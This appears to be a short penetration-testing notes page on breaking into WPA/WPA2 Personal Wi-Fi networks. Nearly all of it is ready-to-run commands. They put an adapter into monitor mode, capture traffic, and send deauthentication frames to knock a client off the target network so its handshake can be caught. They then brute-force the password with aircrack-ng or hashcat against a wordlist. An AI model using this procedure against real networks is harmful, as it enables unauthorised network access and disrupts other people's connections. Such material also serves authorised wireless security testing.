# WPA/WPA2 Personal

WPA2 (Wi-Fi Protected Access II) is a widely used security protocol for securing wireless networks. While it is considered more secure than its predecessor, WPA (Wi-Fi Protected Access), it is not without its vulnerabilities.

Gaining access to a WPA2 Personal network consists of capturing the target network's handshake and brute-forcing the network's secret password. Brute-forcing the secret password can be done using either [Aircrack-ng](https://www.aircrack-ng.org) or [hashcat](https://hashcat.net/hashcat/).

Note that these attacks were done using a Wi-Fi adapter such as this [Alfa Wi-Fi Adapter](https://www.alfa.com.tw/products/awus036ach?variant=36473965871176).

## Setup

```bash
## Kill processes that may interfere with monitor mode
airmon-ng check kill

## Start Monitor Mode
airmon-ng start [network interface]
```

## Exploit (Aircrack-ng)

```bash
## Sniff packets on a specific BSSID and save to a file to analyze
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]

## Deauth a device on the network so we can capture the handshake when it tries to reconnect to the network
aireplay-ng --deauth 10 -a [target network bssid] -c [target device bssid] [interface]

## Use the captured handshake along with a wordlist to try to brute-force the password
aircrack-ng [airodump.cap file] -w [wordlist]
```

## Exploit (hashcat)

```bash
## Stop all services that are accessing the WLAN device
systemctl stop NetworkManager.service
systemctl stop wpa_supplicant.service

## Capture Wi-Fi traffic
hcxdumptool -i [interface] -o [outputfile.pcapng] --active_beacon --enable_status=15

## Restart stopped services to regain network connection
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service

## Convert the .pcapng file to Hashcat format 2200
hcxpcapngtool -o [output.hc22000] -E [wordlist output name] [outputfile.pcapng]

## Run Hashcat using the wordlist from the above command and hc22000 output
hashcat -m 22000 [output.hc22000] [wordlist output]
```

## References

{% embed url="<https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2>" %}

{% embed url="<https://manpages.debian.org/testing/hcxtools/hcxpcapngtool.1.en.html>" %}